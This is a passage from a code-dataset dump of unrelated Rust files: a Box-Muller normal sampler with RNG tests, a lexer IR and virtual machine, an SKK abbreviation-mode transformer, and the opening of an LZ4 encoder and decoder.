}

impl NormalDistribution {
    /// Creates a sampler with the given mean and standard deviation.
    pub fn new(mean: f64, stddev: f64) -> Self {
        Self {
            mean,
            stddev,
            next_number: None,
        }
    }

    /// Given two uniformly sampled random numbers in the range [0, 1], computes
    /// two independent random values with a normal/gaussian distribution
    /// with mean of 0 and standard deviation of 1.
    /// See https://en.wikipedia.org/wiki/Box%E2%80%93Muller_transform
    fn box_muller_transform(u1: f64, u2: f64) -> (f64, f64) {
        // BUGFIX: clamp u1 away from zero. ln(0) == -inf makes r == +inf,
        // and inf * sin(theta) is NaN whenever sin(theta) == 0. The clamp
        // leaves all other inputs unchanged.
        let u1 = u1.max(f64::MIN_POSITIVE);

        let theta = 2.0 * PI * u2;
        let (sin, cos) = theta.sin_cos();
        let r = (-2.0 * u1.ln()).sqrt();
        (r * sin, r * cos)
    }
}
pub trait NormalDistributionRngExt {
    /// Returns the next normally distributed sample, drawing uniform inputs
    /// from `rng`.
    fn next(&mut self, rng: &mut dyn Rng) -> f64;
}

impl NormalDistributionRngExt for NormalDistribution {
    // NOTE(review): returns standard-normal samples; the stored mean/stddev
    // are not applied here — confirm whether scaling was intended.
    fn next(&mut self, rng: &mut dyn Rng) -> f64 {
        // Box-Muller yields samples in pairs; return the buffered second
        // value if one is pending.
        if let Some(v) = self.next_number.take() {
            return v;
        }

        let u1 = rng.between(0.0, 1.0);
        let u2 = rng.between(0.0, 1.0);

        let (z1, z2) = Self::box_muller_transform(u1, u2);
        self.next_number = Some(z2);
        z1
    }
}
#[cfg(test)]
mod tests {
    use super::*;

    // Verifies next_u32() against a reference MT19937 output vector.
    #[test]
    fn mersenne_twister_test() -> Result<()> {
        let mut rng = MersenneTwisterRng::mt19937();
        rng.seed_u32(1234);

        let data = std::fs::read_to_string(project_path!("testdata/mt19937.txt"))?;
        for (i, line) in data.lines().enumerate() {
            let expected = line.parse::<u32>()?;
            assert_eq!(rng.next_u32(), expected, "Mismatch at index {}", i);
        }

        Ok(())
    }

    // Range and rough-uniformity checks for between().
    #[test]
    fn between_inclusive_test() {
        let mut rng = MersenneTwisterRng::mt19937();
        rng.seed_u32(1234);

        for _ in 0..100 {
            let f = rng.between::<f32>(0.0, 1.0);
            assert!(f >= 0.0 && f < 1.0);
        }

        for _ in 0..100 {
            let f = rng.between::<f64>(0.0, 0.25);
            assert!(f >= 0.0 && f < 0.25);
        }

        let min = 427;
        let max = 674;

        let num_iter = 20000000;

        let mut buckets = [0usize; 247];

        for _ in 0..num_iter {
            let n = rng.between::<i32>(min, max);
            assert!(n >= min && n < max);
            buckets[(n - min) as usize] += 1;
        }

        for bucket in buckets {
            // Ideal count is num_iter / range = ~80971 per bucket.
            // NOTE(review): the accepted window is asymmetric (~-12% / +1%
            // around the ideal), not the 1% the old comment claimed.
            assert!(bucket > 71254 && bucket < 81780, "Bucket is {}", bucket);
        }
    }
}
| true |
60f7434b3a2c36018a137dca8c1b124f0dce58f4
|
Rust
|
Atul9/sana
|
/sana_core/src/ir.rs
|
UTF-8
| 12,529 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
use std::{ops::Not, collections::VecDeque};
use crate::automata::{Automata, NodeKind, State};
/// An intermediate representation
///
/// A program is a list of basic blocks; block indices are the jump targets
/// referenced by the `Op` jump instructions until `flatten()` resolves them
/// to instruction addresses.
#[derive(Debug, Clone)]
pub struct Ir<T> {
    pub blocks: Vec<Block<T>>
}
/// A basic block of opcodes. `Func` marks a block that starts a new matching
/// attempt (rendered with a lambda by the pretty-printer); `Block` is a plain
/// jump target. Both variants carry the same payload.
#[derive(Debug, Clone)]
pub enum Block<T> {
    Block(Vec<Op<T>>),
    Func(Vec<Op<T>>),
}

impl<T> Block<T> {
    /// Appends an opcode to this block.
    fn push(&mut self, op: Op<T>) {
        let ops = match self {
            Block::Block(ops) => ops,
            Block::Func(ops) => ops,
        };

        ops.push(op)
    }

    /// The opcodes contained in this block.
    fn ops(&self) -> &[Op<T>] {
        match self {
            Block::Block(ops) => ops.as_slice(),
            Block::Func(ops) => ops.as_slice(),
        }
    }
}

/// IR opcodes
#[derive(Debug, Clone, PartialEq)]
pub enum Op<T> {
    /// Shift the cursor to the next character
    Shift,
    /// Jump if matches
    JumpMatches {
        from: char,
        to: char,
        on_success: usize,
    },
    /// Jump if not matches
    JumpNotMatches {
        from: char,
        to: char,
        on_failure: usize,
    },
    /// Re-enter the current block while the character matches
    LoopMatches {
        from: char,
        to: char,
    },
    /// Just jump
    Jump(usize),
    /// Set current action
    Set(T),
    /// Halt and return an action, if any
    Halt,
}
/// Display adapter that renders an `Ir` as readable, assembly-like text.
#[derive(Debug, Clone)]
pub struct PrettyIr<'a, T>(&'a Ir<T>);

impl<'a, T: std::fmt::Display> std::fmt::Display for PrettyIr<'a, T> {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // One label per block; function blocks are tagged with a lambda.
        for (i, block) in self.0.blocks.iter().enumerate() {
            match block {
                Block::Block(ops) => {
                    writeln!(f, "l{}:", i)?;

                    for op in ops { fmt_op(op, f)? }
                },
                Block::Func(ops) => {
                    writeln!(f, "l{}(λ):", i)?;

                    for op in ops { fmt_op(op, f)? }
                },
            };
        }

        Ok(())
    }
}

// Writes a single indented opcode line in the pretty format.
fn fmt_op<T: std::fmt::Display>(op: &Op<T>, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
    use Op::*;

    write!(f, " ")?;
    match op {
        Shift =>
            writeln!(f, "shift")?,
        JumpMatches { from, to, on_success } =>
            writeln!(f, "jm {:?} {:?} l{}", from, to, on_success)?,
        JumpNotMatches { from, to, on_failure } =>
            writeln!(f, "jnm {:?} {:?} l{}", from, to, on_failure)?,
        LoopMatches { from, to } =>
            writeln!(f, "lm {:?} {:?}", from, to)?,
        Jump(to) =>
            writeln!(f, "jump l{}", to)?,
        Set(act) =>
            writeln!(f, "set {}", act)?,
        Halt =>
            writeln!(f, "halt")?,
    };

    Ok(())
}

impl<T: std::fmt::Display> Ir<T> {
    /// Returns a displayable pretty-printer borrowing this IR.
    pub fn pretty(&self) -> PrettyIr<'_, T> {
        PrettyIr(self)
    }
}
impl<T: Clone> Ir<T> {
    /// Create IR from DFA
    ///
    /// Walks the automaton breadth-first from the initial state, creating one
    /// block per reachable state and lowering its outgoing transitions into
    /// loop/jump opcodes according to the state's node kind.
    pub fn from_automata(automata: Automata<T>) -> Ir<T> {
        let terminal = automata.find_terminal_node();
        let node_kinds = automata.node_kinds();

        // state_blocks[state] = index of the block generated for that state
        // (None until the state is first reached).
        let mut state_blocks: Vec<Option<usize>> =
            vec![None; automata.states.len()];
        let mut blocks = vec![
            Block::Func::<T>(vec![])
        ];
        state_blocks[0] = Some(0);

        // Returns the block index for `st`, allocating a new (empty) block
        // on first encounter. Sink states become entry (`Func`) blocks.
        fn insert_block<T>(
            st: usize,
            state_blocks: &mut [Option<usize>],
            blocks: &mut Vec<Block<T>>,
            node_kinds: &[NodeKind]
        ) -> usize {
            if let Some(i) = state_blocks[st] {
                i
            }
            else {
                let i = blocks.len();
                let block =
                    if node_kinds[st] == NodeKind::Sink {
                        Block::Func(vec![])
                    }
                    else { Block::Block(vec![]) };

                blocks.push(block);
                state_blocks[st] = Some(i);

                i
            }
        }

        let mut queue = VecDeque::new();
        queue.push_back(0usize);
        queue.push_back(terminal);

        let terminal_block = insert_block(
            terminal,
            &mut state_blocks,
            &mut blocks,
            &node_kinds
        );

        while let Some(st) = queue.pop_front() {
            let block_ix = state_blocks[st].unwrap();

            // Inital and terminal do not shift
            if st != 0 && st != terminal {
                blocks[block_ix].push(Op::Shift)
            }

            // Accepting states record their action before dispatching.
            if let Some(State::Action(act)) = automata.get(st) {
                blocks[block_ix].push(Op::Set(act.clone()))
            }

            match node_kinds[st] {
                // Sink/Fork: self-transitions become loops, everything else a
                // conditional forward jump.
                NodeKind::Sink | NodeKind::Fork => {
                    let (loops, next) = automata.transitions_from(st)
                        .partition::<Vec<_>, _>(|&(_, to)| to == st);

                    for (ch, _) in loops {
                        blocks[block_ix].push(Op::LoopMatches {
                            from: ch.start,
                            to: ch.end,
                        });
                    }

                    for (ch, to) in next {
                        if state_blocks[to].is_none() {
                            queue.push_back(to)
                        }

                        let to_block = insert_block(
                            to,
                            &mut state_blocks,
                            &mut blocks,
                            &node_kinds
                        );

                        blocks[block_ix].push(Op::JumpMatches {
                            from: ch.start,
                            to: ch.end,
                            on_success: to_block,
                        });
                    }
                },
                // Link: a single forward edge is lowered as "bail to the
                // terminal block on mismatch, otherwise fall through".
                NodeKind::Link => {
                    let (loops, next) = automata.transitions_from(st)
                        .partition::<Vec<_>, _>(|&(_, to)| to == st);

                    for (ch, _) in loops {
                        blocks[block_ix].push(Op::LoopMatches {
                            from: ch.start,
                            to: ch.end,
                        });
                    }

                    let mut jumps = 0;
                    for (ch, to) in next {
                        if to == terminal { continue }
                        jumps += 1;

                        if state_blocks[to].is_none() {
                            queue.push_back(to)
                        }

                        let to_block = insert_block(
                            to,
                            &mut state_blocks,
                            &mut blocks,
                            &node_kinds
                        );

                        blocks[block_ix].push(Op::JumpNotMatches {
                            from: ch.start,
                            to: ch.end,
                            on_failure: terminal_block,
                        });
                        blocks[block_ix].push(Op::Jump(to_block));
                    }

                    // Only the terminal was reachable: nothing to jump to.
                    if jumps == 0 {
                        blocks[block_ix].push(Op::Halt)
                    }
                },
                // Leaf: loop on matching input, then halt.
                NodeKind::Leaf => {
                    for (ch, to) in automata.transitions_from(st) {
                        if to == terminal { continue }

                        blocks[block_ix].push(Op::LoopMatches {
                            from: ch.start,
                            to: ch.end,
                        });
                    }

                    blocks[block_ix].push(Op::Halt)
                },
                // Terminal: ensure the block ends with exactly one Halt.
                NodeKind::Terminal =>
                    match blocks[block_ix].ops().last() {
                        Some(Op::Halt) => (),
                        _ => blocks[block_ix].push(Op::Halt),
                    }
            }
        }

        Ir { blocks }
    }

    /// Convert IR to the code suitable for VM execution
    ///
    /// Concatenates the blocks and rewrites every block-index jump target
    /// into an absolute instruction address.
    pub fn flatten(&self) -> Vec<Op<T>> {
        let mut code = vec![];
        // symbol_map[block] = address of the block's first instruction.
        let mut symbol_map = Vec::with_capacity(self.blocks.len());
        let mut code_len = 0;
        for block in &self.blocks {
            code.extend(block.ops().iter().cloned());
            symbol_map.push(code_len);
            code_len += block.ops().len();
        }

        for op in &mut code {
            match op {
                Op::JumpMatches { on_success: loc, .. }
                | Op::JumpNotMatches { on_failure: loc, ..}
                | Op::Jump(loc) =>
                    *loc = symbol_map[*loc],
                _ => (),
            }
        }

        code
    }
}
#[derive(Debug, Clone, Copy, PartialEq)]
/// Result returned by `Vm`
///
/// Spans are byte offsets into the input string.
pub enum VmResult<T> {
    /// Action with span `start..end`
    Action {
        start: usize,
        end: usize,
        action: T
    },
    /// Error with span `start..end`
    Error {
        start: usize,
        end: usize,
    },
    /// End of input
    Eoi,
}
/// Character-level read head over an input string.
///
/// `head` is the character currently under the cursor (`None` once the input
/// is exhausted) and the private `pos` is its byte offset into `input`.
#[derive(Debug, Clone)]
pub struct Cursor<'input> {
    pub input: &'input str,
    pub head: Option<char>,
    iter: std::str::Chars<'input>,
    pos: usize,
}

impl<'input> Cursor<'input> {
    /// Creates a cursor positioned at the first character of `input`.
    pub fn new(input: &'input str) -> Self {
        let mut iter = input.chars();
        let head = iter.next();

        Cursor {
            input,
            iter,
            head,
            pos: 0,
        }
    }

    /// Byte offset of the current character within the input.
    pub fn position(&self) -> usize {
        self.pos
    }

    /// Advances past the current character. A past-the-end cursor still moves
    /// the byte offset forward by one per shift.
    pub fn shift(&mut self) {
        let width = match self.head {
            Some(ch) => ch.len_utf8(),
            None => 1,
        };
        self.pos += width;
        self.head = self.iter.next();
    }

    /// Set the cursor position (`pos` must lie on a character boundary).
    pub fn rewind(&mut self, pos: usize) {
        let rest = &self.input[pos..];
        self.iter = rest.chars();
        self.head = self.iter.next();
        self.pos = pos;
    }

    /// True once the whole input has been consumed.
    pub fn is_eoi(&self) -> bool {
        self.head.is_none()
    }
}
/// Executor for flattened IR code (see `Ir::flatten`).
#[derive(Debug, Clone)]
pub struct Vm<'code, 'input, T> {
    pub cursor: Cursor<'input>,
    code: &'code [Op<T>],
}

impl<'code, 'input, T: Clone> Vm<'code, 'input, T> {
    pub fn new(code: &'code [Op<T>], input: &'input str) -> Self {
        let cursor = Cursor::new(input);

        Vm { cursor, code }
    }

    /// Execute the loaded code
    ///
    /// Runs one match attempt from the current cursor position, returning
    /// the last action recognized (longest match), an error span, or Eoi.
    pub fn run(&mut self) -> VmResult<T> {
        // Address of the instruction being executed.
        let mut inst_ptr = 0;
        // Entry address of the current block; LoopMatches re-enters here.
        let mut jump_ptr = 0;
        // Most recent action recorded by Op::Set, if any.
        let mut action = None;

        let start = self.cursor.position();
        // End (byte offset) of the span covered by `action`.
        let mut end = start;

        if self.cursor.is_eoi() {
            return VmResult::Eoi
        }

        loop {
            match &self.code[inst_ptr] {
                Op::Shift => {
                    self.cursor.shift();
                },
                Op::JumpMatches { from, to, on_success } => {
                    // End of input halts execution from any matching op.
                    let cursor =
                        if let Some(ch) = self.cursor.head { ch }
                        else { break };

                    if (*from..=*to).contains(&cursor) {
                        inst_ptr = *on_success;
                        jump_ptr = *on_success;

                        continue;
                    }
                },
                Op::JumpNotMatches { from, to, on_failure } => {
                    let cursor =
                        if let Some(ch) = self.cursor.head { ch }
                        else { break };

                    if (*from..=*to).contains(&cursor).not() {
                        inst_ptr = *on_failure;
                        jump_ptr = *on_failure;

                        continue;
                    }
                },
                Op::LoopMatches { from, to} => {
                    let cursor =
                        if let Some(ch) = self.cursor.head { ch }
                        else { break };

                    // Matching character: restart the current block.
                    if (*from..=*to).contains(&cursor) {
                        inst_ptr = jump_ptr;

                        continue
                    }
                },
                Op::Jump(loc) => {
                    inst_ptr = *loc;
                    jump_ptr = *loc;

                    continue
                },
                Op::Set(act) => {
                    action = Some(act.clone());
                    end = self.cursor.position();
                },
                Op::Halt => break,
            };

            inst_ptr += 1;
        }

        // Characters were consumed but no action recognized: error span.
        if action.is_none() && self.cursor.is_eoi().not() {
            return VmResult::Error {
                start,
                end: self.cursor.position(),
            }
        }

        // Give back any characters consumed past the last accepted position.
        if end != self.cursor.position() { self.cursor.rewind(end) }

        match action {
            Some(action) =>
                VmResult::Action { start, end, action },
            None =>
                VmResult::Eoi
        }
    }
}
| true |
648ebb66ae8853b70082e45cff1c8602663fb2cb
|
Rust
|
tett23/rskk-core
|
/src/transformers/abbr.rs
|
UTF-8
| 6,348 | 2.765625 | 3 |
[
"MIT"
] |
permissive
|
use super::{
AsTransformerTrait, ContinuousTransformer, Displayable, KeyCode, SelectCandidateTransformer,
Stackable, StoppedTransformer, Transformable, TransformerTypes, UnknownWordTransformer,
WithContext, Word,
};
use crate::Context;
/// Transformer for SKK "abbrev" mode: collects an ASCII reading and converts
/// it via the dictionary, or via the unknown-word registration flow.
#[derive(Clone)]
pub struct AbbrTransformer {
    context: Context,
    // Inner transformer pipeline; the bottom element is always a
    // ContinuousTransformer collecting the raw reading.
    stack: Vec<Box<dyn Transformable>>,
}

impl AbbrTransformer {
    pub fn new(context: Context) -> Self {
        Self {
            context: context.clone(),
            stack: vec![box ContinuousTransformer::new(
                context.new_empty(),
                TransformerTypes::Direct,
            )],
        }
    }

    // Starts conversion of the collected reading: dictionary candidates when
    // an entry exists, otherwise the unknown-word flow.
    fn try_composition(&self) -> Box<dyn Transformable> {
        self
            .try_transition_to_select_candidate()
            .map(|tf| -> Box<dyn Transformable> { box tf })
            .unwrap_or(box self.transition_to_unknown_word())
    }

    // Looks the current reading up in the dictionary; None when it has no
    // entry (or no dictionary read form).
    fn try_transition_to_select_candidate(&self) -> Option<SelectCandidateTransformer> {
        self
            .context
            .dictionary()
            .transform(self.to_word().to_dic_read()?)
            .map(|dic_entry| {
                SelectCandidateTransformer::new(self.clone_context(), dic_entry, self.to_word())
            })
    }

    fn transition_to_unknown_word(&self) -> UnknownWordTransformer {
        UnknownWordTransformer::new(self.clone_context(), { self.to_word() })
    }

    // The buffer content wrapped as an abbr-mode dictionary word.
    fn to_word(&self) -> Word {
        Word::new_abbr(self.buffer_content())
    }

    // Resets the stack to a single empty ContinuousTransformer.
    // NOTE(review): uses clone_context() here, while new() uses
    // context.new_empty() — confirm whether the difference is intentional.
    fn clear_stack(&mut self) {
        self.stack = vec![box ContinuousTransformer::new(
            self.clone_context(),
            TransformerTypes::Direct,
        )]
    }
}
// Plain accessors for the transformer's Context.
impl WithContext for AbbrTransformer {
    fn clone_context(&self) -> Context {
        self.context.clone()
    }

    fn context(&self) -> &Context {
        &self.context
    }

    fn set_context(&mut self, context: Context) {
        self.context = context;
    }
}
impl Transformable for AbbrTransformer {
    fn transformer_type(&self) -> TransformerTypes {
        TransformerTypes::Abbr
    }

    // Key events are generally forwarded to the innermost (last) transformer
    // on the stack; its result replaces that stack element.
    fn push_character(&self, character: char) -> Option<Vec<Box<dyn Transformable>>> {
        Some(self.replace_last_element(self.stack.last()?.push_character(character)?))
    }

    fn push_escape(&self) -> Option<Vec<Box<dyn Transformable>>> {
        Some(self.replace_last_element(self.stack.last()?.push_escape()?))
    }

    fn push_enter(&self) -> Option<Vec<Box<dyn Transformable>>> {
        let tfs = self.stack.last()?.push_enter()?;
        // A single stopped transformer ends abbr mode and is returned as-is.
        match &*tfs {
            [] => Some(vec![]),
            [last] if last.is_stopped() => Some(vec![last.clone()]),
            _ => Some(self.replace_last_element(tfs)),
        }
    }

    // Space triggers dictionary conversion while the reading is still being
    // collected; otherwise it is forwarded to the active transformer.
    fn push_space(&self) -> Option<Vec<Box<dyn Transformable>>> {
        let mut tf = self.clone();
        match &*tf.stack {
            [] => Some(vec![]),
            [first] if first.transformer_type() == TransformerTypes::Continuous && first.is_empty() => {
                Some(vec![])
            }
            [first] if first.transformer_type() == TransformerTypes::Continuous => {
                tf.stack.push(tf.try_composition());
                Some(vec![box tf])
            }
            [.., last] => Some(tf.replace_last_element(last.push_space()?)),
        }
    }

    fn push_delete(&self) -> Option<Vec<Box<dyn Transformable>>> {
        if self.stack.len() == 1 && self.is_empty() {
            return Some(vec![]);
        }

        let tf = self.replace_last_element(self.send_target().push_delete()?);
        if !tf.is_empty() {
            return Some(tf);
        }

        // Everything was deleted: fall back to a fresh, empty reading buffer.
        let mut tf = self.clone();
        tf.clear_stack();

        Some(vec![box tf])
    }

    fn push_backspace(&self) -> Option<Vec<Box<dyn Transformable>>> {
        self.push_delete()
    }

    fn push_any_character(&self, key_code: &KeyCode) -> Option<Vec<Box<dyn Transformable>>> {
        let tfs = self.stack.last()?.push_any_character(key_code)?;
        match &*tfs {
            [] => Some(vec![]),
            [.., last] if last.is_stopped() => Some(vec![last.clone()]),
            _ => Some(self.replace_last_element(tfs)),
        }
    }
}
impl Displayable for AbbrTransformer {
    fn buffer_content(&self) -> String {
        self.send_target().buffer_content()
    }

    /// The reading stage is rendered with a leading "▽" marker; any later
    /// stage (e.g. dictionary registration) renders itself.
    fn display_string(&self) -> String {
        match &*self.stack {
            [tf] if tf.transformer_type() == TransformerTypes::Continuous => {
                "▽".to_owned() + &tf.display_string()
            }
            [.., last] => last.display_string(),
            _ => "".to_owned(),
        }
    }
}
impl AsTransformerTrait for AbbrTransformer {
    fn as_trait(&self) -> Box<dyn Transformable> {
        box self.clone()
    }

    /// The transformer that key events are delegated to: the top of the
    /// stack, or a completed stopped transformer when the stack is empty.
    fn send_target(&self) -> Box<dyn Transformable> {
        match self.stack.last() {
            Some(tf) => tf.clone(),
            None => box StoppedTransformer::completed(self.clone_context()),
        }
    }
}
impl Stackable for AbbrTransformer {
    fn push(&self, item: Box<dyn Transformable>) -> Box<dyn Transformable> {
        let mut ret = self.clone();
        ret.stack.push(item);
        box ret
    }

    /// Pops the top transformer; popping the last element cancels the whole
    /// AbbrTransformer.
    fn pop(&self) -> (Box<dyn Transformable>, Option<Box<dyn Transformable>>) {
        let mut ret = self.clone();
        let item = ret.stack.pop();
        if ret.stack.len() == 0 {
            return (self.to_canceled(), item);
        }

        (box ret, item)
    }

    /// Replaces the top transformer with `items`; if the stack ends up empty
    /// the whole transformer dissolves (returns an empty vec).
    fn replace_last_element(
        &self,
        items: Vec<Box<dyn Transformable>>,
    ) -> Vec<Box<dyn Transformable>> {
        let mut ret = self.clone();

        ret.stack.pop();
        items.iter().for_each(|item| ret.stack.push(item.clone()));
        if ret.stack.len() == 0 {
            return vec![];
        }

        vec![box ret]
    }

    fn stack(&self) -> Vec<Box<dyn Transformable>> {
        self.stack.clone()
    }
}
#[cfg(test)]
mod tests {
    use crate::tests::dummy_context;
    use crate::transformers::StoppedReason::*;
    use crate::transformers::TransformerTypes::*;

    #[test]
    fn it_works() {
        let conf = dummy_context();
        // Each entry: a key sequence, then the expected display string,
        // optional committed buffer, and the resulting transformer type.
        let vec = crate::tds![conf, Abbr;
            ["[backspace]", { display: "", transformer_type: Stopped(Canceled) }],
            ["a[backspace]", { display: "▽", transformer_type: Abbr }],
            ["test", { display: "▽test", transformer_type: Abbr }],
            ["test\n", { display: "", stopped_buffer: "test", transformer_type: Stopped(Compleated) }],
            ["hoge ", { display: "[登録: hoge]", transformer_type: Abbr }],
            ["hoge [escape]", { display: "▽hoge", transformer_type: Abbr }],
            ["hoge [backspace]", { display: "[登録: hoge]", transformer_type: Abbr }],
            ["hoge fuga", { display: "[登録: hoge]ふが", transformer_type: Abbr }],
            ["hoge fuga\n", { display: "", stopped_buffer: "ふが", transformer_type: Stopped(Compleated) }],
        ];
        crate::tests::helpers::TestData::batch(vec);
    }
}
| true |
96ae676a879c860cfaeb9ae52c01e49915c099c1
|
Rust
|
sathorn6/rust-compress
|
/src/lz4.rs
|
UTF-8
| 23,274 | 2.703125 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
/*!
LZ4 Decompression and Compression. Requires `lz4` feature, enabled by default
This module contains an implementation in Rust of decompression and compression
of LZ4-encoded streams. These are exposed as a standard `Reader` and `Writer`
interfaces wrapping an underlying stream.
# Example
```rust,ignore
use compress::lz4;
use std::fs::File;
use std::path::Path;
use std::io::Read;
let stream = File::open(&Path::new("path/to/file.lz4")).unwrap();
let mut decompressed = Vec::new();
lz4::Decoder::new(stream).read_to_end(&mut decompressed);
```
# Credit
This implementation is largely based on Branimir Karadžić's implementation which
can be found at https://github.com/bkaradzic/go-lz4.
*/
use std::cmp;
use std::ptr::copy_nonoverlapping;
use std::io::{self, Read, Write};
use std::iter::repeat;
use std::vec::Vec;
use std::num::Wrapping;
use std::ops::Shr;
use super::byteorder::{LittleEndian, WriteBytesExt, ReadBytesExt};
use super::{ReadExact, byteorder_err_to_io};
// Magic number identifying an LZ4 frame header.
const MAGIC: u32 = 0x184d2204;

// Token byte layout: low 4 bits are the match length, high 4 bits are the
// literal run length.
const ML_BITS: u32 = 4;
const ML_MASK: u32 = (1 << ML_BITS as usize) - 1;
const RUN_BITS: u32 = 8 - ML_BITS;
const RUN_MASK: u32 = (1 << RUN_BITS as usize) - 1;

// The encoder never emits matches shorter than this many bytes.
const MIN_MATCH: u32 = 4;
// Encoder hash table: 2^17 slots indexed by a hash of 4-byte sequences.
const HASH_LOG: u32 = 17;
const HASH_TABLE_SIZE: u32 = 1 << (HASH_LOG as usize);
const HASH_SHIFT: u32 = (MIN_MATCH * 8) - HASH_LOG;
// After this many bytes without a match, the encoder accelerates its skip
// through apparently incompressible data.
const INCOMPRESSIBLE: u32 = 128;
// Sentinel offset marking hash-table slots as uninitialized.
const UNINITHASH: u32 = 0x88888888;
// Largest input size for which a compressed-size bound can be computed.
const MAX_INPUT_SIZE: u32 = 0x7e000000;
/// Decoder state for a single raw LZ4 block.
struct BlockDecoder<'a> {
    input: &'a [u8],         // compressed block bytes
    output: &'a mut Vec<u8>, // decompressed bytes accumulate here
    cur: usize,   // read cursor into `input`
    start: usize, // start of the current back-reference within `output`
    end: usize,   // number of valid bytes written to `output`
}
impl<'a> BlockDecoder<'a> {
    /// Decodes this block of data from 'input' to 'output', returning the
    /// number of valid bytes in the output.
    fn decode(&mut self) -> usize {
        while self.cur < self.input.len() {
            let code = self.bump();
            debug!("block with code: {:x}", code);
            // Extract a chunk of data from the input to the output.
            {
                // High nibble of the token: the literal run length.
                let len = self.length(code >> 4);
                debug!("consume len {}", len);
                if len > 0 {
                    let end = self.end;
                    self.grow_output(end + len);
                    // SAFETY(review): assumes `cur + len` is within `input`
                    // for well-formed blocks — malformed input would read out
                    // of bounds here; verify against trusted callers.
                    unsafe { copy_nonoverlapping(
                        &self.input[self.cur],
                        &mut self.output[end],
                        len
                    )};
                    self.end += len;
                    self.cur += len;
                }
            }
            if self.cur == self.input.len() { break }

            // Read off the next i16 offset
            {
                let back = (self.bump() as usize) | ((self.bump() as usize) << 8);
                debug!("found back {}", back);
                self.start = self.end - back;
            }

            // Slosh around some bytes now
            {
                // Low nibble of the token: match length (MIN_MATCH implied).
                let mut len = self.length(code & 0xf);
                let literal = self.end - self.start;
                if literal < 4 {
                    // Overlapping short match: copy 4 bytes with a stride
                    // correction so the repeated pattern lines up.
                    static DECR: [usize; 4] = [0, 3, 2, 3];
                    self.cp(4, DECR[literal]);
                } else {
                    len += 4;
                }
                self.cp(len, 0);
            }
        }
        self.end
    }

    /// Decodes a (possibly extended) length field: a nibble of 15 means
    /// additional length bytes follow, each adding up to 255.
    fn length(&mut self, code: u8) -> usize {
        let mut ret = code as usize;
        if code == 0xf {
            loop {
                let tmp = self.bump();
                ret += tmp as usize;
                if tmp != 0xff { break }
            }
        }
        ret
    }

    /// Returns the next input byte and advances the read cursor.
    fn bump(&mut self) -> u8 {
        let ret = self.input[self.cur];
        self.cur += 1;
        ret
    }

    /// Byte-by-byte copy of `len` bytes from `start` to `end` within the
    /// output; must be sequential because source and destination may overlap.
    #[inline]
    fn cp(&mut self, len: usize, decr: usize) {
        let end = self.end;
        self.grow_output(end + len);
        for i in 0..len {
            self.output[end + i] = (*self.output)[self.start + i];
        }

        self.end += len;
        self.start += len - decr;
    }

    // Extends the output vector to a target number of bytes (in total), but
    // does not actually initialize the new data. The length of the vector is
    // updated, but the bytes will all have undefined values. It is assumed that
    // the next operation is to pave over these bytes (so the initialization is
    // unnecessary).
    #[inline]
    fn grow_output(&mut self, target: usize) {
        if self.output.capacity() < target {
            debug!("growing {} to {}", self.output.capacity(), target);
            //let additional = target - self.output.capacity();
            //self.output.reserve(additional);
            while self.output.len() < target {
                self.output.push(0);
            }
        } else {
            // SAFETY(review): exposes uninitialized bytes until the caller
            // overwrites them; sound only because every caller immediately
            // fills the range `[end, target)`.
            unsafe {
                self.output.set_len(target);
            }
        }
    }
}
/// Encoder state for producing a single raw LZ4 block.
struct BlockEncoder<'a> {
    input: &'a [u8],         // uncompressed source bytes
    output: &'a mut Vec<u8>, // compressed block is written here
    hash_table: Vec<u32>,    // maps 4-byte-sequence hashes to input positions
    pos: u32,      // current scan position in `input`
    anchor: u32,   // start of literals not yet emitted
    dest_pos: u32  // write position in `output`
}
/// Returns the worst-case compressed size for `size` input bytes, or `None`
/// when the input exceeds the maximum size LZ4 supports.
pub fn compression_bound(size: u32) -> Option<u32> {
    match size {
        s if s > MAX_INPUT_SIZE => None,
        s => Some(s + (s / 255) + 16 + 4),
    }
}
impl<'a> BlockEncoder<'a> {
    /// Reads the 4-byte little-endian sequence starting at `pos`.
    #[inline(always)]
    fn seq_at(&self, pos: u32) -> u32 {
        (self.input[pos as usize + 3] as u32) << 24
            | (self.input[pos as usize + 2] as u32) << 16
            | (self.input[pos as usize + 1] as u32) << 8
            | (self.input[pos as usize] as u32)
    }

    /// Emits one token byte (literal run length in the high nibble, match
    /// length in the low nibble), extended length bytes when the run is 15
    /// or longer, then `len` literal bytes copied from `input[pos..]`.
    fn write_literals(&mut self, len: u32, ml_len: u32, pos: u32) {
        let mut ln = len;

        let code = if ln > RUN_MASK - 1 { RUN_MASK as u8 } else { ln as u8 };

        if ml_len > ML_MASK - 1 {
            self.output[self.dest_pos as usize] = (code << ML_BITS as usize) + ML_MASK as u8;
        } else {
            self.output[self.dest_pos as usize] = (code << ML_BITS as usize) + ml_len as u8;
        }
        self.dest_pos += 1;

        // Lengths >= RUN_MASK continue in subsequent bytes, 255 at a time.
        if code == RUN_MASK as u8 {
            ln -= RUN_MASK;
            while ln > 254 {
                self.output[self.dest_pos as usize] = 255;
                self.dest_pos += 1;
                ln -= 255;
            }
            self.output[self.dest_pos as usize] = ln as u8;
            self.dest_pos += 1;
        }

        // FIXME: find out why slicing syntax fails tests
        //self.output[self.dest_pos as usize .. (self.dest_pos + len) as usize] = self.input[pos as uint.. (pos + len) as uint];
        for i in 0..(len as usize) {
            self.output[self.dest_pos as usize + i] = self.input[pos as usize + i];
        }
        self.dest_pos += len;
    }

    /// Compresses `input` into `output`, returning the number of compressed
    /// bytes produced (0 when the input is too large to bound).
    fn encode(&mut self) -> u32 {
        let input_len = self.input.len() as u32;

        match compression_bound(input_len) {
            None => 0,
            Some(out_size) => {
                let out_size_usize = out_size as usize;
                if self.output.capacity() < out_size_usize {
                    let additional = out_size_usize - self.output.capacity();
                    self.output.reserve(additional);
                }
                // SAFETY(review): length is rolled back to `dest_pos` before
                // returning, so the uninitialized tail is never exposed.
                unsafe { self.output.set_len(out_size_usize); }

                let mut step = 1u32;
                let mut limit = INCOMPRESSIBLE;
                loop {
                    // Too close to the end to form a match: flush the
                    // remaining bytes as literals and finish.
                    if self.pos + 12 > input_len {
                        let tmp = self.anchor;
                        self.write_literals(self.input.len() as u32 - tmp, 0, tmp);
                        unsafe { self.output.set_len(self.dest_pos as usize) };
                        return self.dest_pos;
                    }

                    let seq = self.seq_at(self.pos);
